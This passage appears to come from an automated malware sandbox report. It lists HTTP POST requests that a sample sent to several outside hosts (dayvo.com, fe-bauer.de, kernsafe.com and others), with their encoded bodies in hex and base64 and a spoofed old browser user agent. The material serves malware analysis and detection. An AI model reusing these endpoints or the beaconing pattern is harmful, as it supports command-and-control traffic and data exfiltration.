57 4b 75 6b 6e 4c 72 52 6d 72 50 73 4b 44 45 78 46 31 64 6c 36 71 46 37 6f 41 47 6b 42 78 47 54 6e 45 45 39 72 45 4e 35 64 4a 6a 56 4e 54 58 66 45 7a 70 4b 44 30 52 43 37 54 4a 59 77 52 61 76 48 32 42 37 66 31 78 37 52 64 78 7a 31 73 74 4d 4d 51 31 46 6e 6c 4f 4e 47 78 33 4a 4d 4f 74 73 69 2f 68 39 66 30 66 78 42 76 6f 75 6a 6b 4c 66 68 66 44 52 48 32 61 45 67 32 69 4d 38 53 53 41 37 46 44 78 39 47 6b 73 50 71 6d 44 44 57 54 56 43 32 57 42 68 67 74 53 41 36 32 77 32 2b 65 34 56 48 55 74 78 4a 46 56 56 38 54 63 39 48 35 79 46 68 72 56 67 31 38 32 57 35 61 71 63 35 72 43 2f 4c 54 76 34 6c 62 72 78 78 38 61 72 48 48 34 67 39 38 46 6b 41 48 4e 36 74 30 51 55 47 4a 41 38 48 55 46 4f 31 79 42 62 32 44 70 34 31 45 61 73 4f 6d 67 43 75 41 54 57 53 62 32 32 51 47 51 78 6b 37 44 77 35 79 35 4a 36 6a 6a 4a 35 35 70 44 33 48 31 71 73 53 58 64 77 6c 75 32 6f 39 48 51 31 6d 2f 65 65 6e 77 4c 6f 63 53 76 76 42 70 57 45 66 6d 6e 75 53 32 47 70 79 6e 6f 4b 75 70 79 51 37 58 4d 50 71 4d 34 78 64 45 52 36 4f 66 6e 48 46 61 7a 55 73 6b 68 62 7a 62 71 68 56 72 4a 4a 61 6e 49 6d 75 49 42 49 6c 67 47 6b 35 4a 4b 70 66 69 6f 42 65 5a 39 33 47 34 79 58 4b 70 73 56 36 55 69 37 57 33 58 6c 4a 63 37 65 41 6d 4e 4f 4d 53 7a 45 2b 4a 6c 33 58 6a 77 45 7a 42 37 74 77 3d 3d Data Ascii: hI0hxrEYx5fJGAJp0LqqrgoQV1TvVx75daKvLmr+eHqkBl5AP5DMW7itwaoV56XY+7+RTF1huZtquy7BpreBs7iu6BqKSLXpYKeMTsAawJrd+JWY2mysr9WsdmV796O7QXm4TRHPZ9EFmKlmqvHhGa4B2RFTmaNxzmRTBBJ4RG+WKuknLrRmrPsKDExF1dl6qF7oAGkBxGTnEE9rEN5dJjVNTXfEzpKD0RC7TJYwRavH2B7f1x7Rdxz1stMMQ1FnlONGx3JMOtsi/h9f0fxBvoujkLfhfDRH2aEg2iM8SSA7FDx9GksPqmDDWTVC2WBhgtSA62w2+e4VHUtxJFVV8Tc9H5yFhrVg182W5aqc5rC/LTv4lbrxx8arHH4g98FkAHN6t0QUGJA8HUFO1yBb2Dp41EasOmgCuATWSb22QGQxk7Dw5y5J6jjJ55pD3H1qsSXdwlu2o9HQ1m/eenwLocSvvBpWEfmnuS2GpynoKupyQ7XMPqM4xdER6OfnHFazUskhbzbqhVrJJanImuIBIlgGk5JKpfioBeZ93G4yXKpsV6Ui7W3XlJc7eAmNOMSzE+Jl3XjwEzB7tw==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dayvo.comCache-Control: no-cacheData Raw: 69 79 31 41 33 52 5a 71 38 5a 66 4c 7a 4b 36 2f 38 52 6f 63 67 4c 6b 62 6e 34 61 32 2b 62 72 35 71 75 66 57 65 36 76 42 45 46 39 72 74 59 75 4d 70 37 44 44 51 6e 63 75 57 35 31 73 2b 4a 38 6d 31 59 38 57 70 64 33 78 63 51 63 6e 38 70 55 75 43 33 6f 58 63 44 53 36 77 53 33 6a 32 70 50 6f 57 73 36 4a 45 62 77 45 36 2f 32 43 4a 57 2b 53 43 35 56 5a 70 75 6a 62 36 47 73 58 49 45 63 63 4c 6d 50 39 36 55 34 2f 6e 4c 64 6c 73 41 38 66 53 31 31 77 70 4d 66 66 37 30 78 78 7a 31 41 42 37 70 6b 6c 50 30 6d 48 63 37 45 73 6a 70 76 48 51 71 34 33 32 4a 59 4c 39 71 65 5a 55 65 71 72 32 43 55 62 71 6b 58 34 78 66 78 6a 35 63 69 75 45 38 6d 4f 50 2f 69 55 34 43 75 49 56 58 50 69 48 6d 49 62 56 36 34 49 2f 45 4f 52 55 50 66 63 73 4f 58 72 55 71 4a 65 46 6e 71 73 32 59 51 71 6b 49 32 36 34 61 53 32 67 2f 64 5a 63 59 33 69 70 4d 44 6d 2f 6f 2b 73 76 43 49 59 59 71 7a 76 55 62 47 68 49 42 52 41 55 33 77 6d 31 42 46 70 4a 62 51 75 49 66 70 39 6b 31 72 75 6a 6a 72 71 45 69 58 71 67 4c 4f 2f 35 74 51 73 76 68 30 63 4e 73 71 76 38 56 4b 41 74 45 44 79 7a 4b 52 6b 65 38 43 51 55 78 75 45 53 75 74 41 43 62 6a 2b 53 59 6f 41 50 4c 57 69 6e 55 63 59 4b 4c 33 4c 62 73 66 68 42 43 52 46 34 67 79 42 2b 63 70 67 72 58 64 4d 49 72 38 32 44 49 34 6f 34 6a 63 6b 71 6c 33 68 74 34 58 6b 6a 42 56 2b 64 69 6b 58 6d 42 70 78 53 62 4e 75 53 77 43 79 4f 34 4e 72 44 59 67 47 6d 4f 30 35 4d 6c 32 64 45 53 74 30 63 4e 49 49 6f 76 51 44 49 43 47 37 6c 55 71 45 37 44 49 44 66 2f 35 63 52 46 49 74 44 45 65 76 6e 46 6a 7a 4f 56 57 37 76 6c 56 69 52 4d 58 34 6c 36 2f 4c 31 6f 37 66 43 75 73 48 6e 63 6d 62 79 4e 4c 41 35 6a 73 73 77 43 61 42 77 33 6b 77 34 6f 69 76 42 67 6d 55 59 62 58 6e 57 52 67 3d Data Ascii: iy1A3RZq8ZfLzK6/8RocgLkbn4a2+br5qufWe6vBEF9rtYuMp7DDQncuW51s+J8m1Y8Wpd3xcQcn8pUuC3oXcDS6wS3j2pPoWs6JEbwE6/2CJW+SC5VZpujb6GsXIEccLmP96U4/nLdlsA8fS11wpMff70xxz1AB7pklP0mHc7EsjpvHQq432JYL9qeZUeqr2CUbqkX4xfxj5ciuE8mOP/iU4CuIVXPiHmIbV64I/EORUPfcsOXrUqJeFnqs2YQqkI264aS2g/dZcY3ipMDm/o+svCIYYqzvUbGhIBRAU3wm1BFpJbQuIfp9k1rujjrqEiXqgLO/5tQsvh0cNsqv8VKAtEDyzKRke8CQUxuESutACbj+SYoAPLWinUcYKL3LbsfhBCRF4gyB+cpgrXdMIr82DI4o4jckql3ht4XkjBV+dikXmBpxSbNuSwCyO4NrDYgGmO05Ml2dESt0cNIIovQDICG7lUqE7DIDf/5cRFItDEevnFjzOVW7vlViRMX4l6/L1o7fCusHncmbyNLA5jsswCaBw3kw4oivBgmUYbXnWRg=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 6c 2f 4e 43 30 6f 6c 39 78 35 66 59 55 6e 62 6f 32 4f 6e 31 72 36 4a 47 46 2f 43 6e 43 65 46 6d 7a 61 6a 2f 79 35 42 53 4c 7a 59 52 56 43 47 34 53 48 69 76 58 58 36 77 50 4a 78 63 44 73 54 7a 73 46 51 4d 67 34 78 58 33 43 61 5a 7a 39 32 4b 4b 68 2f 68 73 44 6e 72 57 4d 6d 36 59 33 65 54 36 4d 49 6d 31 4a 4c 6e 4a 36 4b 4a 4b 6e 7a 55 54 31 64 61 6a 46 31 4a 75 39 52 37 38 54 43 4b 2b 59 37 6d 46 5a 72 2b 58 6a 73 68 76 62 5a 45 62 6d 46 41 63 6a 44 6a 44 6e 66 32 72 2f 7a 34 55 35 48 34 4e 2f 77 6e 32 47 68 32 36 58 6d 70 6f 74 46 70 4c 36 63 58 2b 7a 76 62 4c 32 59 48 73 71 44 58 66 66 77 4d 63 4f 63 2b 64 6a 77 69 51 59 57 41 42 51 44 6f 78 72 41 44 72 62 65 56 53 64 55 70 55 4f 68 70 49 42 4d 75 43 75 30 51 4a 74 67 64 52 4e 62 57 35 36 77 68 6d 67 4e 4d 47 39 69 2f 57 56 61 30 71 75 30 72 56 4a 56 67 76 67 72 4c 46 4b 39 4c 70 54 74 68 74 65 62 48 42 6d 66 4b 4b 65 4e 65 78 47 33 39 73 61 42 67 64 74 5a 65 7a 75 47 43 42 76 63 6f 32 62 36 68 71 2b 70 4d 4c 45 4a 5a 70 30 6b 74 4c 72 66 51 6d 46 4c 70 6a 6d 36 6c 65 48 4c 69 75 78 6f 2f 33 56 69 46 54 62 33 59 50 49 49 56 63 4f 36 67 6a 71 33 4a 7a 6b 34 62 72 61 77 65 77 2f 2f 49 57 50 79 67 79 32 4a 6f 77 73 79 78 39 2b 57 4c 65 73 73 54 43 55 72 71 67 30 2f 65 6d 6d 57 4d 79 50 58 2f 4c 71 56 4b 4e 44 52 6b 6d 74 58 58 59 75 35 61 75 4d 74 66 4d 71 39 4f 35 71 67 4e 48 4b 75 76 4d 72 4a 69 34 4a 70 43 6f 75 58 73 37 58 38 5a 33 73 51 68 50 51 53 31 54 30 4e 56 68 59 4b 62 31 77 59 71 4c 62 54 5a 6b 31 39 73 48 48 39 69 2b 4c 76 5a 36 56 76 74 63 4e 62 72 4a 4c 4c 34 31 66 59 6e 6e 66 62 51 69 75 4a 4e 34 31 46 64 39 43 62 76 51 68 33 74 70 74 6a 30 64 49 42 71 2b 77 3d 3d Data Ascii: l/NC0ol9x5fYUnbo2On1r6JGF/CnCeFmzaj/y5BSLzYRVCG4SHivXX6wPJxcDsTzsFQMg4xX3CaZz92KKh/hsDnrWMm6Y3eT6MIm1JLnJ6KJKnzUT1dajF1Ju9R78TCK+Y7mFZr+XjshvbZEbmFAcjDjDnf2r/z4U5H4N/wn2Gh26XmpotFpL6cX+zvbL2YHsqDXffwMcOc+djwiQYWABQDoxrADrbeVSdUpUOhpIBMuCu0QJtgdRNbW56whmgNMG9i/WVa0qu0rVJVgvgrLFK9LpTthtebHBmfKKeNexG39saBgdtZezuGCBvco2b6hq+pMLEJZp0ktLrfQmFLpjm6leHLiuxo/3ViFTb3YPIIVcO6gjq3Jzk4brawew//IWPygy2Jowsyx9+WLessTCUrqg0/emmWMyPX/LqVKNDRkmtXXYu5auMtfMq9O5qgNHKuvMrJi4JpCouXs7X8Z3sQhPQS1T0NVhYKb1wYqLbTZk19sHH9i+LvZ6VvtcNbrJLL41fYnnfbQiuJN41Fd9CbvQh3tptj0dIBq+w==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.cel-cpa.comCache-Control: no-cacheData Raw: 37 6a 72 56 4e 2b 72 4a 79 70 66 5a 45 42 39 77 7a 58 41 49 64 71 32 4f 37 34 30 61 79 48 47 67 76 6e 4b 68 53 71 69 37 39 74 72 54 6f 74 33 7a 74 49 58 62 47 71 62 74 4e 6d 41 55 71 42 72 4f 70 77 4c 4f 2b 64 38 45 4f 67 59 68 7a 35 41 46 51 38 6e 70 41 6a 58 43 33 7a 42 38 4a 48 49 4a 37 71 38 45 55 67 52 6b 6e 72 31 49 33 47 59 79 58 4f 4a 55 67 47 4b 37 4b 53 67 72 34 74 39 52 74 4b 39 66 62 6e 39 77 75 49 65 43 52 2f 63 44 56 7a 52 55 73 30 55 37 34 31 5a 4d 65 70 61 63 68 36 51 62 68 71 75 68 72 79 51 6a 43 5a 44 73 79 36 68 37 35 57 79 43 70 37 61 44 45 52 65 6e 4f 6e 48 46 33 70 52 68 31 71 58 41 72 35 74 68 63 4c 75 43 49 6c 43 48 33 68 32 4d 77 4b 6a 4b 47 62 6e 44 71 59 4f 32 48 4e 51 4a 61 38 75 41 68 56 77 4a 62 59 78 47 4c 67 66 44 4a 6f 41 41 75 4c 51 35 39 38 35 69 33 65 64 2b 77 42 74 78 6e 70 64 68 4b 33 43 63 6e 32 50 41 6e 6e 4e 6e 63 52 31 74 57 79 47 70 39 34 4b 63 6d 45 47 35 73 6b 38 2b 54 44 68 56 62 52 57 5a 61 61 39 46 6e 31 50 6b 57 30 41 55 6c 38 33 76 34 48 78 64 49 2b 54 68 6c 39 71 34 36 59 65 53 2b 31 42 4e 63 65 5a 61 53 39 69 58 35 33 4f 75 53 43 57 56 67 64 4b 6a 54 77 2f 67 5a 48 49 57 38 50 52 2f 62 4d 65 66 6c 65 65 5a 42 2f 4a 35 34 69 74 32 75 34 33 53 73 64 6f 41 70 6f 75 30 34 4a 58 71 57 62 2f 77 2f 51 53 6a 37 6d 56 4e 4c 32 67 4e 34 50 76 34 79 75 53 31 41 46 78 41 44 61 44 33 67 6f 48 36 36 31 57 2b 46 51 54 73 49 42 45 76 4c 75 4b 70 6b 2f 37 4e 57 78 6f 62 49 57 6e 56 67 41 70 73 75 74 33 56 79 32 6a 6f 49 34 32 33 31 30 75 6e 53 76 6e 63 5a 59 57 5a 6c 61 54 6b 69 73 6d 41 76 37 56 48 32 66 54 41 50 78 7a 43 6a 39 48 31 72 78 35 59 71 43 35 66 4c 55 41 64 Data Ascii: 7jrVN+rJypfZEB9wzXAIdq2O740ayHGgvnKhSqi79trTot3ztIXbGqbtNmAUqBrOpwLO+d8EOgYhz5AFQ8npAjXC3zB8JHIJ7q8EUgRknr1I3GYyXOJUgGK7KSgr4t9RtK9fbn9wuIeCR/cDVzRUs0U741ZMepach6QbhquhryQjCZDsy6h75WyCp7aDERenOnHF3pRh1qXAr5thcLuCIlCH3h2MwKjKGbnDqYO2HNQJa8uAhVwJbYxGLgfDJoAAuLQ5985i3ed+wBtxnpdhK3Ccn2PAnnNncR1tWyGp94KcmEG5sk8+TDhVbRWZaa9Fn1PkW0AUl83v4HxdI+Thl9q46YeS+1BNceZaS9iX53OuSCWVgdKjTw/gZHIW8PR/bMefleeZB/J54it2u43SsdoApou04JXqWb/w/QSj7mVNL2gN4Pv4yuS1AFxADaD3goH661W+FQTsIBEvLuKpk/7NWxobIWnVgApsut3Vy2joI42310unSvncZYWZlaTkismAv7VH2fTAPxzCj9H1rx5YqC5fLUAd
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dayvo.comCache-Control: no-cacheData Raw: 69 79 31 41 33 52 5a 71 38 5a 66 4c 7a 4b 36 2f 38 52 6f 63 67 4c 6b 62 6e 34 61 32 2b 62 72 35 71 75 66 57 65 36 76 42 45 46 39 72 74 59 75 4d 70 37 44 44 51 6e 63 75 57 35 31 73 2b 4a 38 6d 31 59 38 57 70 64 33 78 63 51 63 6e 38 70 55 75 43 33 6f 58 63 44 53 36 77 53 33 6a 32 70 50 6f 57 73 36 4a 45 62 77 45 36 2f 32 43 4a 57 2b 53 43 35 56 5a 70 75 6a 62 36 47 73 58 49 45 63 63 4c 6d 50 39 36 55 34 2f 6e 4c 64 6c 73 41 38 66 53 31 31 77 70 4d 66 66 37 30 78 78 7a 31 41 42 37 70 6b 6c 50 30 6d 48 63 37 45 73 6a 70 76 48 51 71 34 33 32 4a 59 4c 39 71 65 5a 55 65 71 72 32 43 55 62 71 6b 58 34 78 66 78 6a 35 63 69 75 45 38 6d 4f 50 2f 69 55 34 43 75 49 56 58 50 69 48 6d 49 62 56 36 34 49 2f 45 4f 52 55 50 66 63 73 4f 58 72 55 71 4a 65 46 6e 71 73 32 59 51 71 6b 49 32 36 34 61 53 32 67 2f 64 5a 63 59 33 69 70 4d 44 6d 2f 6f 2b 73 76 43 49 59 59 71 7a 76 55 62 47 68 49 42 52 41 55 33 77 6d 31 42 46 70 4a 62 51 75 49 66 70 39 6b 31 72 75 6a 6a 72 71 45 69 58 71 67 4c 4f 2f 35 74 51 73 76 68 30 63 4e 73 71 76 38 56 4b 41 74 45 44 79 7a 4b 52 6b 65 38 43 51 55 78 75 45 53 75 74 41 43 62 6a 2b 53 59 6f 41 50 4c 57 69 6e 55 63 59 4b 4c 33 4c 62 73 66 68 42 43 52 46 34 67 79 42 2b 63 70 67 72 58 64 4d 49 72 38 32 44 49 34 6f 34 6a 63 6b 71 6c 33 68 74 34 58 6b 6a 42 56 2b 64 69 6b 58 6d 42 70 78 53 62 4e 75 53 77 43 79 4f 34 4e 72 44 59 67 47 6d 4f 30 35 4d 6c 32 64 45 53 74 30 63 4e 49 49 6f 76 51 44 49 43 47 37 6c 55 71 45 37 44 49 44 66 2f 35 63 52 46 49 74 44 45 65 76 6e 46 6a 7a 4f 56 57 37 76 6c 56 69 52 4d 58 34 6c 36 2f 4c 31 6f 37 66 43 75 73 48 6e 63 6d 62 79 4e 4c 41 35 6a 73 73 77 43 61 42 77 33 6b 77 34 6f 69 76 42 67 6d 55 59 62 58 6e 57 52 67 3d Data Ascii: iy1A3RZq8ZfLzK6/8RocgLkbn4a2+br5qufWe6vBEF9rtYuMp7DDQncuW51s+J8m1Y8Wpd3xcQcn8pUuC3oXcDS6wS3j2pPoWs6JEbwE6/2CJW+SC5VZpujb6GsXIEccLmP96U4/nLdlsA8fS11wpMff70xxz1AB7pklP0mHc7EsjpvHQq432JYL9qeZUeqr2CUbqkX4xfxj5ciuE8mOP/iU4CuIVXPiHmIbV64I/EORUPfcsOXrUqJeFnqs2YQqkI264aS2g/dZcY3ipMDm/o+svCIYYqzvUbGhIBRAU3wm1BFpJbQuIfp9k1rujjrqEiXqgLO/5tQsvh0cNsqv8VKAtEDyzKRke8CQUxuESutACbj+SYoAPLWinUcYKL3LbsfhBCRF4gyB+cpgrXdMIr82DI4o4jckql3ht4XkjBV+dikXmBpxSbNuSwCyO4NrDYgGmO05Ml2dESt0cNIIovQDICG7lUqE7DIDf/5cRFItDEevnFjzOVW7vlViRMX4l6/L1o7fCusHncmbyNLA5jsswCaBw3kw4oivBgmUYbXnWRg=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.kernsafe.comCache-Control: no-cacheData Raw: 70 4c 74 69 49 55 46 51 36 35 64 35 39 2b 6c 2f 49 4f 79 30 69 78 71 43 74 34 65 2f 58 6d 37 41 42 63 74 6c 52 50 44 31 58 49 48 79 50 4b 4d 51 37 78 63 4c 58 63 4a 74 4e 62 67 62 6e 63 58 72 4a 69 35 59 5a 31 30 72 72 71 67 6b 79 45 2f 42 50 49 78 6d 46 42 2f 50 62 4b 54 71 64 48 5a 68 53 6f 44 58 64 36 62 5a 6a 46 41 72 63 2f 4a 4a 47 54 43 73 52 42 67 42 4d 33 6e 52 6f 75 76 43 72 46 46 73 4d 6f 32 6e 4a 31 66 6a 78 33 34 47 6a 6a 58 46 36 6f 30 56 57 68 6c 64 53 6b 68 4a 49 59 78 67 36 2f 62 78 57 68 38 62 68 69 59 45 68 43 65 72 38 2f 52 4a 6a 31 58 36 33 36 4b 4d 64 68 42 7a 50 6d 2b 74 67 78 72 31 54 58 72 6c 74 75 66 62 41 47 33 72 46 4f 6f 65 4e 39 6e 7a 46 4b 68 64 79 43 6f 36 71 56 4f 46 43 38 64 58 72 64 54 75 4f 4e 6c 7a 34 64 49 43 33 39 37 52 38 67 76 55 33 35 70 71 65 53 6d 78 68 50 6d 55 45 58 6f 37 74 43 38 73 41 4b 76 4b 31 56 51 39 70 74 55 56 48 37 7a 52 7a 51 70 33 6c 61 4d 61 6d 68 38 72 65 4a 2f 6b 38 77 48 79 5a 58 79 35 77 42 49 6e 36 2b 6d 30 33 58 55 45 6c 31 52 39 45 39 67 2b 76 45 69 43 6f 78 4d 34 5a 75 56 52 5a 72 39 53 57 47 47 78 39 44 79 66 55 31 65 79 36 37 68 30 47 33 2b 55 42 6f 47 31 74 78 49 4f 76 72 71 64 56 63 6e 71 42 58 4f 51 75 65 65 4b 73 47 33 4c 36 58 65 75 4f 71 63 32 76 6c 44 4f 70 61 56 57 63 6b 7a 56 47 4c 46 2b 74 39 53 62 30 7a 35 43 6d 78 6f 51 43 47 51 78 52 33 77 57 47 57 32 33 4b 6d 4e 35 74 4d 57 33 64 39 72 72 36 32 63 76 30 55 74 4a 66 30 6a 74 47 6b 54 44 4f 33 5a 78 2f 49 2f 6e 4e 41 5a 73 6c 4a 43 6f 35 54 49 63 76 6e 72 42 33 2b 6b 44 6b 35 4b 39 76 63 59 36 64 31 67 64 52 35 38 58 39 2f 51 79 53 47 59 49 57 72 51 2f 51 6a 79 34 43 38 43 32 69 43 69 33 68 54 55 6b 6e 41 37 6e 78 4f 6e 55 Data Ascii: pLtiIUFQ65d59+l/IOy0ixqCt4e/Xm7ABctlRPD1XIHyPKMQ7xcLXcJtNbgbncXrJi5YZ10rrqgkyE/BPIxmFB/PbKTqdHZhSoDXd6bZjFArc/JJGTCsRBgBM3nRouvCrFFsMo2nJ1fjx34GjjXF6o0VWhldSkhJIYxg6/bxWh8bhiYEhCer8/RJj1X636KMdhBzPm+tgxr1TXrltufbAG3rFOoeN9nzFKhdyCo6qVOFC8dXrdTuONlz4dIC397R8gvU35pqeSmxhPmUEXo7tC8sAKvK1VQ9ptUVH7zRzQp3laMamh8reJ/k8wHyZXy5wBIn6+m03XUEl1R9E9g+vEiCoxM4ZuVRZr9SWGGx9DyfU1ey67h0G3+UBoG1txIOvrqdVcnqBXOQueeKsG3L6XeuOqc2vlDOpaVWckzVGLF+t9Sb0z5CmxoQCGQxR3wWGW23KmN5tMW3d9rr62cv0UtJf0jtGkTDO3Zx/I/nNAZslJCo5TIcvnrB3+kDk5K9vcY6d1gdR58X9/QySGYIWrQ/Qjy4C8C2iCi3hTUknA7nxOnU
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.myropcb.comCache-Control: no-cacheCookie: myro_ct_dtl=eyJSRVFVRVNUX1VSSSI6IlwvIiwiUkVESVJFQ1RfVU5JUVVFX0lEIjoiWkhkQ2ZIYlprUUw4ZmRqdDJRaWh1Z0FBQUJFIiwiUkVESVJFQ1RfU0NSSVBUX1VSTCI6IlwvIiwiUkVESVJFQ1RfU0NSSVBUX1VSSSI6Imh0dHA6XC9cL3d3dy5teXJvcGNiLmNvbVwvIiwiUkVESVJFQ1RfRE9DVU1FTlRfUk9PVCI6Ilwva3VuZGVuXC9ob21lcGFnZXNcLzlcL2QzMjgxNTE4NDdcL2h0ZG9jc1wvY2xpY2thbmRidWlsZHNcL215cm9wY2IiLCJSRURJUkVDVF9IVFRQX0FVVEhPUklaQVRJT04iOiIiLCJSRURJUkVDVF9IQU5ETEVSIjoieC1tYXBwLXBocDUiLCJSRURJUkVDVF9TVEFUVVMiOiIyMDAiLCJVTklRVUVfSUQiOiJaSGRDZkhiWmtRTDhmZGp0MlFpaHVnQUFBQkUiLCJTQ1JJUFRfVVJMIjoiXC8iLCJTQ1JJUFRfVVJJIjoiaHR0cDpcL1wvd3d3Lm15cm9wY2IuY29tXC8iLCJIVFRQX0hPU1QiOiJ3d3cubXlyb3BjYi5jb20iLCJDT05URU5UX0xFTkdUSCI6IjU0MCIsIkhUVFBfQUNDRVBUIjoiKlwvKiIsIkhUVFBfQUNDRVBUX0xBTkdVQUdFIjoiZW4tdXMiLCJDT05URU5UX1RZUEUiOiJhcHBsaWNhdGlvblwvb2N0ZXQtc3RyZWFtIiwiSFRUUF9VU0VSX0FHRU5UIjoiTW96aWxsYVwvNC4wIChjb21wYXRpYmxlOyBNU0lFIDYuMDsgV2luZG93cyBOVCA1LjE7IFNWMSkiLCJIVFRQX0NBQ0hFX0NPTlRST0wiOiJuby1jYWNoZSIsIlJFTU9URV9BRERSIjoiMTAyLjEyOS4xNDMuNDMiLCJSRVFVRVNUX1NDSEVNRSI6Imh0dHAiLCJDT05URVhUX1BSRUZJWCI6Ilwvc3lzdGVtLWJpblwvIiwiQ09OVEVYVF9ET0NVTUVOVF9ST09UIjoiXC9rdW5kZW5cL3VzclwvbGliXC9jZ2ktYmluXC8iLCJSRU1PVEVfUE9SVCI6IjQyMDk2IiwiUkVESVJFQ1RfVVJMIjoiXC9pbmRleC5waHAiLCJSRVFVRVNUX01FVEhPRCI6IlBPU1QiLCJRVUVSWV9TVFJJTkciOiIiLCJTQ1JJUFRfTkFNRSI6IlwvaW5kZXgucGhwIiwiU1RBVFVTIjoiMjAwIiwiT1JJR19QQVRIX0lORk8iOiJcL2luZGV4LnBocCIsIk9SSUdfUEFUSF9UUkFOU0xBVEVEIjoiXC9rdW5kZW5cL2hvbWVwYWdlc1wvOVwvZDMyODE1MTg0N1wvaHRkb2NzXC9jbGlja2FuZGJ1aWxkc1wvbXlyb3BjYlwvaW5kZXgucGhwIiwiUEhQX1NFTEYiOiJcL2luZGV4LnBocCIsIlJFUVVFU1RfVElNRV9GTE9BVCI6MTY4NTUzNzQwNC45MTE3NDksIlJFUVVFU1RfVElNRSI6MTY4NTUzNzQwNCwiYXJndiI6W10sImFyZ2MiOjB9; myro_ct=eyJ1cmwiOiIiLCJpcCI6IjEwMi4xMjkuMTQzLjQzIn0%3D; shield-notbot-nonce=7638bd2648
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 47 4d 78 63 55 64 50 50 42 5a 69 6c 59 78 36 55 6d 70 4d 6a 6b 58 77 74 2f 69 53 35 51 6e 67 48 74 38 71 47 71 76 4f 4f 79 44 39 50 4f 6a 33 57 63 42 4c 58 6c 61 7a 6f 48 2b 65 56 77 56 6d 63 72 5a 62 53 69 46 4f 2b 44 75 78 37 56 4d 62 41 7a 4c 71 51 4b 57 50 70 38 4f 36 71 45 4a 7a 47 46 42 72 39 32 33 75 49 43 78 47 4b 64 71 44 36 2b 59 50 34 56 36 46 64 5a 33 56 43 56 56 78 34 70 57 7a 50 6c 35 6f 4c 58 7a 73 2b 57 37 6e 35 63 30 78 6f 31 48 46 32 4f 4f 75 59 61 54 39 49 4d 48 46 31 34 34 61 70 2f 4e 55 36 58 58 58 74 78 70 41 2f 71 51 77 32 74 36 4e 43 52 7a 66 6a 53 6c 70 78 72 32 51 6d 53 33 67 2b 78 47 79 6f 2f 58 47 51 48 6a 59 4c 49 38 30 53 6a 64 57 56 76 2f 55 5a 65 43 6c 65 50 68 58 4e 63 57 66 79 6f 50 44 54 35 39 6c 76 75 37 4c 52 55 49 74 58 54 74 6f 4d 48 74 77 50 6e 62 44 45 6b 53 55 77 76 76 56 49 75 47 62 6f 54 38 51 38 62 51 6e 49 4e 53 79 78 48 4e 34 62 66 7a 46 7a 53 70 4d 4a 46 42 46 5a 4b 61 54 52 34 56 58 38 6a 4e 59 2f 51 6e 70 79 35 71 6f 61 4d 4b 33 73 2b 72 2b 53 46 6e 6c 39 64 62 6f 55 53 36 6d 59 54 30 57 38 70 65 6a 61 72 45 71 31 30 32 2f 6b 47 62 73 71 59 31 74 59 6b 58 7a 39 5a 69 30 79 78 6b 66 44 43 6a 47 67 62 66 6c 42 76 64 37 65 54 72 73 61 50 5a 54 34 34 66 73 54 6d 41 4e 36 62 45 2b 6e 35 78 34 75 2f 78 6d 6c 78 37 37 34 70 74 57 78 66 44 47 79 45 61 35 76 68 77 57 4f 54 70 7a 70 34 7a 65 36 73 77 5a 2b 4b 61 4f 59 61 4b 78 49 4f 4b 77 66 6f 62 62 49 71 38 32 37 69 62 38 35 41 32 6b 64 49 46 69 6c 41 2f 43 38 2f 78 78 65 68 43 63 33 6f 52 57 55 4a 2b 32 30 6d 49 39 50 71 67 64 70 68 66 45 4d 55 61 64 47 54 4a 64 34 6a 4d 6b 59 6e 49 37 4a Data Ascii: GMxcUdPPBZilYx6UmpMjkXwt/iS5QngHt8qGqvOOyD9POj3WcBLXlazoH+eVwVmcrZbSiFO+Dux7VMbAzLqQKWPp8O6qEJzGFBr923uICxGKdqD6+YP4V6FdZ3VCVVx4pWzPl5oLXzs+W7n5c0xo1HF2OOuYaT9IMHF144ap/NU6XXXtxpA/qQw2t6NCRzfjSlpxr2QmS3g+xGyo/XGQHjYLI80SjdWVv/UZeClePhXNcWfyoPDT59lvu7LRUItXTtoMHtwPnbDEkSUwvvVIuGboT8Q8bQnINSyxHN4bfzFzSpMJFBFZKaTR4VX8jNY/Qnpy5qoaMK3s+r+SFnl9dboUS6mYT0W8pejarEq102/kGbsqY1tYkXz9Zi0yxkfDCjGgbflBvd7eTrsaPZT44fsTmAN6bE+n5x4u/xmlx774ptWxfDGyEa5vhwWOTpzp4ze6swZ+KaOYaKxIOKwfobbIq827ib85A2kdIFilA/C8/xxehCc3oRWUJ+20mI9PqgdphfEMUadGTJd4jMkYnI7J
